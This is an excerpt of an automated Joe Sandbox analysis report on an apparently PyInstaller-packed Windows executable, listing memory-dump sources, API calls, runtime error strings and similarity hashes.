• Instruction ID: 6e688795dbb874b520d03be46d44b84a0809813ed08d6bb98db52e5100d8b550
• Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
• Instruction Fuzzy Hash: 7131C563B1EB42D1EE529B0AA4106B563A4FF48BA8F594535DF5DC73A0EF3CE4449310

Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
• Instruction ID: 81718045b4f0cc2df8531e2afdf1908686f62bc0f3d0074c7a022fbbb2a69b9f
• Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
• Instruction Fuzzy Hash: 10417F23A1CA8791EB25DB28E4542E96321FF44398F800132EB5D876F6EF3CE609C740

APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6B750351A,?,00000000,00007FF6B7503F23), ref: 00007FF6B7502AA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
• Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction ID: 8c35499528c39134f5f1d509e0d18074a5e02f9d051e11ab1c8276c4dd5abcb8
• Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
• Instruction Fuzzy Hash: 53218133A1CB8242E7209B59B8417EA63A4FB88784F400136FF8D93669EF7CD2458740

APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                                                                                                                                                              • Instruction ID: ecca1fa4048c1f0645fd4cf9537cc6e17f9bc88fb270afc802bfe2f958577f01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A215022E4D66281F9656B2E5A5113952A35F44BB2F064734DB7EC7EF6DD2CA8408340
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction ID: 7bb057d4a1b864632c54c1fa524d2138cc32d689d2c8113b2b7deee4b25e3809
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94119322B1CB4586E7608B1AE85432962A4FB88BE4F040238EB5EC77B4DF3CD8548740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508EFD
                                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508F5A
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508FE5
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7509044
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7509055
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B750906A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                                              • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                              • Instruction ID: 9fe932e7894e609dc6cbd0b8133375de173c3dd386a6ad6ff7ae69a523ee9496
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26419E63B1D68281EA309B1AA5106BA73A5FB85BC8F444135DF8D97BE9DF3CE501CB00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B2D7
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B30D
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B33A
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B34B
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B35C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B377
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                                                                                                                                                              • Instruction ID: 8f0d45b7c7eba19b6f41621ab2dad24c1d84020922bbc82c8f4d57c986d1eaa5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA119322F0D66682FA556B3D5A4113D62929F44BB2F044734DB6FC7EF6DE2CA8518300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B7501B6A), ref: 00007FF6B750295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction ID: 1b6fb42ce5781a95a3f00f5674bc150965e2f73fdbac7012c130e31c6e47e7c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F731D623B1C68552E7209B69A8506EA6394BF887D8F400136FF8DC3769EF3CD546C600
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6B750918F,?,00007FF6B7503C55), ref: 00007FF6B7502BA0
• MessageBoxW.USER32 ref: 00007FF6B7502C2A
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6B7501B99), ref: 00007FF6B7502760
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3AF
• FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3CE
• FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3F6
• FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B407
• FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B418
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                                                                                                                                                              • Instruction ID: a25641608412af6962b6f90a1162dd7dc15549389ad82ead16ff0720a206439a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D119622F0DA2241F9559B2E594117962925F44BB2F488334DB7EC6EF6DD2CF8418300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                                                                                                                                                              • Instruction ID: 2261d46ceb3bc7d2e9bc78e71854b9d4c6a5248508228b0b8a68ee9704f7abe9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF118E22E0D66341F9696B7E485117E12924F46B32F084B74DB7ECAEF3DD2DB8848301
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction ID: f99eb74c11320d08b98c2a526d1315dc3e9ffcb2f44da47dced1f32cc0a6ef2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF91BC23A0CA6681FB618F28D45037E37A1EB40B96F854136DB5E83BE6DF3DE8458341
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction ID: 3fc33de8bb598934345648d721c902761075629d5de7b4a27321690c4a03c39b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7281D473E0E66385FBA49F2DC95027836A0AB11B4AF558535CB0AD7AF5CF2DED029301
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction ID: 2a6e29ca6118db7ebf224c583c939c08d5583424a0c3414f13170ac969fe1405
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A518B77A1D7428AEB248B19E448B787391EB44B98F518134EB4EC77A8EF7DE841D700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction ID: 0dca6f276b202735388ca35439d1dfa12fd42c77ab39edb388c470d84faeb9dd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D361813390CBC585DB709B19E4407AAB7A0FB85798F144225EB9D83BA9DF7CD190CB00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction ID: 347cc6605aa26888af7f23de5ebe77f6d11b9cd7a242246b2218f23e557e36dd
